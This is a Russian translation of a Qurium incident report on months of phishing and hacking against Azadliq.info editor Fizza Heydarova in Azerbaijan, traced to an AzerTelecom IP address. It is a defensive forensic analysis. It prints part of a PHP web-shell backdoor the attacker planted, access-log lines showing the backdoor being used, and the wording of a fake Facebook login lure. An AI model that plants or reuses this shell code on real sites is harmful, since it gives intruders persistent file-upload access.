В течение прошлого года Qurium зафиксировал рост целенаправленных фишинговых атак против независимых СМИ и правозащитников в Азербайджане. Атаки осуществляются из инфраструктуры страны безнаказанно.
История Физзы Гейдаровой, редактора Azadliq.info, является примером того, как фишинговые атаки на критиков режима и правозащитников в Азербайджане становятся все более целенаправленными и изощренными. Кроме того, с полной безнаказанностью начинаются фишинговые атаки с IP-пространства, принадлежащего AzerTelecom, одному из крупнейших интернет-провайдеров страны.
Злоумышленник, нацеленный на Fizza, использовал несколько векторов атаки и сумел скомпрометировать ее учетную запись Gmail и получить доступ к своей учетной записи WordPress с помощью Azadliq.info. В попытке обеспечить постоянный доступ к сайту, злоумышленник установил на него несколько бэкдоров. Однако все попытки получить доступ к бэкдорам были заблокированы Qurium, хостинг-провайдером Azadliq.
Злоумышленник также предпринял несколько попыток взломать учетную запись Facebook Физзы , включая отправку поддельного сообщения, подражающего Facebook, перенаправляющего ее на поддельную страницу входа в Facebook.
Количество использованных векторов атак и тот факт, что атаки проводились в течение нескольких месяцев, демонстрируют определенный уровень самоотдачи и решимости. Атаки проводились с IP-адреса 134 {.} 19.217.249, который является тем же IP-адресом, который использовался для запуска атак на другие независимые СМИ в Азербайджане в прошлом, включая основную инфраструктуру Qurium.
22 апреля 2019 года редактор Азадлыг (Azadlıq Qəzeti) Физза Гейдарова сообщил:
В апреле 2019 года Физза получила предупреждение от Facebook о том, что был произведен доступ к учетной записи с IP-адреса 134 {.} 19.217.249 с сети AzerTelecom.
Злоумышленник получил доступ к учетной записи Gmail Физзы и сбросил пароль к учетной записи Facebook. После того, как злоумышленник получил доступ к записи, он попытался изменить адрес электронной почты для восстановления на fizze.heyderova.16{@}bk.ru
Злоумышленник заходит на сайт azadliq.info
Получив доступ к учетной записи Gmail, злоумышленник просматривает папку «Входящие» и находит письмо с учетными данными с веб-сайта Azadliq.info. 23 апреля 2019 года злоумышленник получил доступ к административной области веб-сайта, используя выход с анонимной сети Tor с IP-адресом 65 {.} 19.167.132.
«65.19.167.132» «» «-» «23/Apr/2019:10:08:28 +0000» «1556014108.286» «GET» «/rightxxxx» «Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0»
Вскоре после этого злоумышленник устанавливает на сайт бэкдор. Он крадет код из старого бэкдора 2017 года от дейейсера «Aissa Wolf1200».
set_time_limit(0);
error_reporting(0);
if(isset($_GET["rhs334"])){echo"<center></center></enter><font color=black></font>".php_uname()."";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><input name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}
if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href="" rel="stylesheet" type="text/css">
<title>index.php</title>
<style>
body{
font-family: "orbitron";
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
Злоумышленник устанавливает в систему еще один бэкдор, скрытый с помощью FOPO (бесплатный онлайн-обфускатор PHP). Он загружает код с exploit.com.
Злоумышленник не замечает, что «оболочка», которую он скачал с exploit.com, уже забекдорена автором «byhero44». Полное описание этого «бэкдор на бэкдор» можно найти здесь.
К 23 апреля 2019 года злоумышленник установил два бэкдора на сайт Азадлыг. Код от них обоих был найден на публичных форумах, и один из них и был зашифрован и забэкдорен самим автором.
8 мая 2019 года злоумышленник редактирует тему WordPress, пытаясь украсть пароли сайта. Он подключается к бэкдору с помощью браузера Tor.
"185.220.102.7" "08/May/2019:12:52:59 +0000" "GET" "/wp-admin/plugins.php?_wpnonce=96f78b228f&action=activate&plugin=wp-file-manager/file_folder_manager.php" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
Поскольку Qurium блокирует его попытку, он пытается подключиться снова, используя UltraVPN.
161.129.70.190" "08/May/2019:13:08:04 +0000" "1557320884.848" "GET" "/" "https://www.azadliq.info/wp-admin/admin.php?page=wp_file_manager" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
Qurium заблокировал несколько попыток, исходящих от разных VPN каналов, пока злоумышленник не разорвал свое VPN-соединение с 161 {.} 129.70.190 и повторно подключился с 134 {.} 19.217.249, того же IP-адреса от AzerTelecom, который пытался получить доступ к учетной записи Facebook Физзы.
В ожидании возвращения злоумышленника
В течение нескольких недель злоумышленник не предпринимал дальнейших попыток доступа к бэкдорам, размещенным на веб-сайте Azadliq, до 31 мая 2019 года, когда он опять пытался проникнуть в свои скрытые бэкдоры, используя хост сети Tor, размещенный на M247 Ltd.
"195.206.105.217" "31/May/2019:15:16:01 +0000" "GET" "/wp-content/uploads/2015/12/a.txt?id=randdaoma" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0" "195.206.105.217" "31/May/2019:15:16:15 +0000" "GET" "/wp-content/uploads/2015/12/a.txt?" "Mozilla/5.0 (Windows NT 6.1; rv:60.0) Gecko/20100101 Firefox/60.0"
Заметив, что бэкдор не работает, злоумышленник возвращается 6 июня, используя другого провайдера Windscribe VPN 142 {.} 44.173.129.
«Кто-то вошел в вашу учетную запись Facebook. Пожалуйста, обновите ваш пароль по этой ссылке, если это были не вы
Ссылка открывала на поддельную страницу входа в Facebook.
Сервис Bit.ly предоставляет интересную информацию о созданной им короткой ссылке. Мы исследовали путь «2Jjbxnc» и получили данную информацию.
Ссылка была создана 7 мая 2019 года, но до 19 мая никаких действий не было. Попытка атаки на Физзу была 23 мая. Судя по количеству кликов, ссылка была отправлена нескольким жертвам.
На веб-сайте https://www.itdib.az злоумышленник разместил поддельную страницу входа в Facebook внутри доступной для записи папки .well-known, папки, используемой шифрованием Let для предоставления новых SSL-сертификатов.
Что такое itdib.az? Гюльчатай открой личико!
Itdib в Азербайджане является общественной инициативой для информационной поддержки общественных инициатив, которыми руководит Сезарет Гусейнзаде. Эта платформа предоставила бесплатное место для размещения нескольких НПО в Азербайджане по IP-адресу: 77 {.} 245.159.55
Еще одна попытка …
В июне 2019 года злоумышленник пытается получить доступ к учетной записи Физзы в мессенджере Телеграм , используя выход IPv6 сети Tor.
Что мы знаем о 134 {.} 19.217.249?
Фишинговые атаки — не единственные атаки с этого IP-адреса. В последние годы мы зафиксировали следующие попытки с того же IP-адреса:
2018/10: Acunetix scan against azadliq.info 2018/11: Web Flood against cumhuriyyet.net 2019/12: Vulnerability scan against meydan.tv 2020/02: Bruteforce attempts against Qurium services: FTP/IMAP/POP
В 2020 году IP-адрес остался активным и произвел брутфорс атаки на домен azadliq.info и meydan.tv, чтобы найти скрытые сервисы этих организаций.
На IP-адресе «.249» размещается маршрутизатор Mikrotik в сети внутри AzerTelecom с очень небольшим количеством общедоступных услуг.
По данным Censys.ip, в сети размещены 9 камер наблюдения от производителя Hikvision по адресам:
134.19.217{.}136
134.19.217{.}140
134.19.217{.}142
134.19.217{.}155
134.19.217{.}164 x
134.19.217{.}174
134.19.217{.}45
134.19.217{.}63 x
134.19.217{.}92
В августе 2019 года тот же IP-адрес, что и фишинговая атака против Физзы (134 {.} 19.217.249), редактирует страницу Википедии Вилайта Эйвазова, работника Министерство внутренних дел Азербайджана.
Отчет публикуется с разрешения https://www.qurium.org/
Оригинал отчета на английском языке
Перевод Константин Адамов.
